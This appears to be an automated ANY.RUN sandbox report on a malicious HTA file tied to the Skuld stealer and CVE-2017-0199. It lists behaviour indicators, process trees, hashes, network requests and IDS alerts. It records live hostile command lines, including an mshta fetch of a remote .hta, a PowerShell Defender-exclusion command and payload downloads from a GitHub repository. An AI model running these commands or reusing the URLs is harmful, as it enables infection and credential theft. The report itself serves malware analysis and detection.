download:

/gate.hta

Full analysis: https://app.any.run/tasks/945c65bf-3bfb-4da4-8a0c-d0bd80f0ebd8
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: April 17, 2026, 00:18:54
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
cve-2017-0199
exploit
github
arch-exec
arch-scr
discord
stealer
evasion
skuld
anti-evasion
arch-doc
Indicators:
MIME: text/html
File info: HTML document, ASCII text
MD5:

7A4970BE24C5B2BFE12808E3103465E8

SHA1:

0D006CDA450B4F57E92EA4ADED3B99C63508F14D

SHA256:

67593E9EEF29486F46E47F4C6A849F037D01E097CC62B0DCD55B2F902DCFA326

SSDEEP:

24:EUJck9UKKqJsMIo7rMMGjl9KK6szmjr+GN9/drWh8AMw3hpCWlSAE2HmCMDkp:k4l7rfS4Bv/9Jrm36Wkn2Hmgp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Gets TEMP folder path (SCRIPT)

      • mshta.exe (PID: 2432)
    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 2432)
    • Downloads files via BITSADMIN.EXE

      • mshta.exe (PID: 2432)
    • Known privilege escalation attack

      • dllhost.exe (PID: 7612)
    • Changes Windows Defender settings

      • wscript.exe (PID: 7996)
    • Adds path to the Windows Defender exclusion list

      • wscript.exe (PID: 7996)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 6432)
    • Steals credentials from Web Browsers

      • searchHost.bin (PID: 2436)
    • Actions looks like stealing of personal data

      • searchHost.bin (PID: 2436)
    • SKULD has been detected

      • searchHost.bin (PID: 2436)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 2432)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 2432)
      • wscript.exe (PID: 7996)
    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 2432)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 2432)
      • wscript.exe (PID: 7996)
    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 2432)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7244)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7244)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3140)
      • cmd.exe (PID: 7200)
      • cmd.exe (PID: 6432)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 2432)
    • Executed via WMI

      • powershell.exe (PID: 7244)
    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 7996)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7244)
      • sync.exe (PID: 7880)
    • Starts application with an unusual extension

      • sync.exe (PID: 7880)
    • Possible stealing of messenger data

      • searchHost.bin (PID: 2436)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7996)
    • Creates scheduled task with highest privileges

      • cmd.exe (PID: 6432)
      • schtasks.exe (PID: 6988)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • wscript.exe (PID: 7996)
    • Possible stealing from crypto wallets

      • searchHost.bin (PID: 2436)
    • Uses WMIC.EXE to obtain operating system information

      • searchHost.bin (PID: 2436)
    • Possible stealing of email data

      • searchHost.bin (PID: 2436)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 2832)
    • Uses WMIC.EXE to obtain CPU information

      • searchHost.bin (PID: 2436)
    • Checks for external IP

      • svchost.exe (PID: 2232)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 6576)
    • Uses NETSH.EXE to obtain data on the network

      • searchHost.bin (PID: 2436)
    • Executes application which crashes

      • msedge.exe (PID: 2528)
      • chrome.exe (PID: 2676)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 7872)
    • Uses WMIC.EXE to obtain a list of video controllers

      • searchHost.bin (PID: 2436)
    • Uses WMIC.EXE to obtain Windows Installer data

      • searchHost.bin (PID: 2436)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2432)
    • The sample compiled with english language support

      • powershell.exe (PID: 7244)
    • Checks supported languages

      • sync.exe (PID: 7880)
      • searchHost.bin (PID: 2436)
      • SDXhelper.exe (PID: 1152)
    • Reads the computer name

      • sync.exe (PID: 7880)
      • searchHost.bin (PID: 2436)
      • SDXhelper.exe (PID: 1152)
    • Reads the machine GUID from the registry

      • sync.exe (PID: 7880)
      • searchHost.bin (PID: 2436)
    • Creates files or folders in the user directory

      • sync.exe (PID: 7880)
      • WerFault.exe (PID: 7512)
      • WerFault.exe (PID: 3200)
    • Checks transactions between databases Windows and Oracle

      • sync.exe (PID: 7880)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 7612)
      • WMIC.exe (PID: 2832)
      • WMIC.exe (PID: 7624)
      • WMIC.exe (PID: 6576)
      • WMIC.exe (PID: 7872)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7244)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7244)
      • powershell.exe (PID: 2324)
    • Using PowerShell for ZIP File Operations

      • powershell.exe (PID: 7244)
    • Launching a file from Task Scheduler

      • cmd.exe (PID: 6432)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2324)
    • There is functionality for taking screenshot (YARA)

      • sync.exe (PID: 7880)
    • Create files in a temporary directory

      • searchHost.bin (PID: 2436)
    • Drops encrypted JS script (Microsoft Script Encoder)

      • searchHost.bin (PID: 2436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
167
Monitored processes
35
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1108bcdeditC:\Windows\System32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\cryptsp.dll
1152C:\Users\admin\AppData\Local\Service\SDXhelper.exeC:\Users\admin\AppData\Local\Service\SDXhelper.exe
sync.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\service\sdxhelper.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2120\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeWMIC.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2316netsh wlan show profilesC:\Windows\System32\netsh.exesearchHost.bin
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2324"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\users\admin'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2368\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2392\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exebitsadmin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2432"C:\Windows\System32\mshta.exe" https://guildlock.net/gate.hta #ID=15364473672C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
3221225547
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
Total events
30 393
Read events
30 387
Write events
6
Delete events
0

Modification events

(PID) Process:(2432) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2432) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2432) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7612) dllhost.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\system32\cmlua.dll,-100
Value:
Connection Manager
(PID) Process:(7612) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(7200) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
Executable files
17
Suspicious files
15
Text files
19
Unknown types
0

Dropped files

PID
Process
Filename
Type
2432mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:7F924EAEA21BB91214FF7B4525F3BD29
SHA256:E718475014C8F51A8F2746FBE90A7BFF516B65BEF36EE6340A5FC746BC5DFC32
2432mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DCA703036AE86250D5D947BE7ECA910binary
MD5:764FBCA0040CAFEFEFDEC7DC422D5923
SHA256:3818501BAFB7335FF921A41EDDB55255493B962C05731470B0ED800B66F15FF4
2432mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\gate[1].htahtml
MD5:7A4970BE24C5B2BFE12808E3103465E8
SHA256:67593E9EEF29486F46E47F4C6A849F037D01E097CC62B0DCD55B2F902DCFA326
7244powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_01pnqgvu.5hh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2432mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DCA703036AE86250D5D947BE7ECA910binary
MD5:61134572E3217FF181F4C38DD36EC97C
SHA256:9442AB2E6DA97684F28490697DB8DAC88C9264B323345D5B1B7A6C573A1C9089
2432mshta.exeC:\Users\admin\AppData\Local\Temp\output1.txttext
MD5:46787AA77B6A8291BD04A6F794744C92
SHA256:39FDA17B5EB8A26353406EBD428ECBEC4B5BFAD97E7B6AD5D30D67AECBF8EAE4
7244powershell.exeC:\Users\admin\AppData\Local\Temp\extracted\liblzma.dllexecutable
MD5:88B0CDB33655CB58D448EFD5D4E9FD6D
SHA256:C812CA5E53C2B771D806C28561AFEF1B227B04F9B31DB306CACAA8BD5FB5ECFD
7244powershell.exeC:\Users\admin\AppData\Local\Temp\extracted\check.vbstext
MD5:E59B162F5D3C56FC733A260B6B900426
SHA256:AE0F0A6B2EFF5009B798C587113870D511440642AB91DD1FC28F6F002CBCF84D
7244powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rdyyw4zc.txw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7244powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3nucij2c.12p.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
43
TCP/UDP connections
37
DNS requests
28
Threats
29

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7160
svchost.exe
HEAD
200
185.199.108.133:443
https://raw.githubusercontent.com/ManakJ/dgrrdg/refs/heads/main/help
US
whitelisted
6260
svchost.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
whitelisted
7244
powershell.exe
GET
302
140.82.121.3:443
https://github.com/ManakJ/dgrrdg/raw/refs/heads/main/sync.zip
US
whitelisted
7408
SIHClient.exe
GET
304
74.178.240.61:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
7408
SIHClient.exe
GET
200
135.232.92.97:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
whitelisted
7408
SIHClient.exe
GET
200
74.178.240.61:443
https://slscr.update.microsoft.com/sls/ping
US
whitelisted
7408
SIHClient.exe
GET
304
74.178.240.61:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
whitelisted
5276
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
5276
MoUsoCoreWorker.exe
GET
200
23.32.238.112:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
2432
mshta.exe
GET
200
104.18.20.213:80
http://e8.c.lencr.org/94.crl
US
binary
56.2 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
6260
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
23.32.238.112:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5276
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
48.192.1.64:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
2432
mshta.exe
104.21.7.199:443
guildlock.net
CLOUDFLARENET
US
whitelisted
2432
mshta.exe
104.18.20.213:80
e8.c.lencr.org
CLOUDFLARENET
US
whitelisted
3148
svchost.exe
239.255.255.250:1900
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.32.238.112
  • 23.32.238.107
  • 23.216.77.6
  • 23.216.77.28
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 23.59.18.102
  • 72.246.29.11
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted
google.com
  • 142.251.110.102
  • 142.251.110.138
  • 142.251.110.113
  • 142.251.110.100
  • 142.251.110.139
  • 142.251.110.101
whitelisted
guildlock.net
  • 104.21.7.199
  • 172.67.156.69
unknown
e8.c.lencr.org
  • 104.18.20.213
  • 104.18.21.213
whitelisted
raw.githubusercontent.com
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.109.133
whitelisted
github.com
  • 140.82.121.3
whitelisted
guildsecure.com
  • 104.21.20.29
  • 172.67.191.1
unknown

Threats

PID
Process
Class
Message
2432
mshta.exe
Potentially Bad Traffic
ET INFO Possible HTA Application Download
2432
mshta.exe
Misc activity
ET INFO Observed UA-CPU Header
2432
mshta.exe
Attempted User Privilege Gain
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
2232
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
6260
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7244
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7244
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7880
sync.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
7880
sync.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
7880
sync.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
No debug info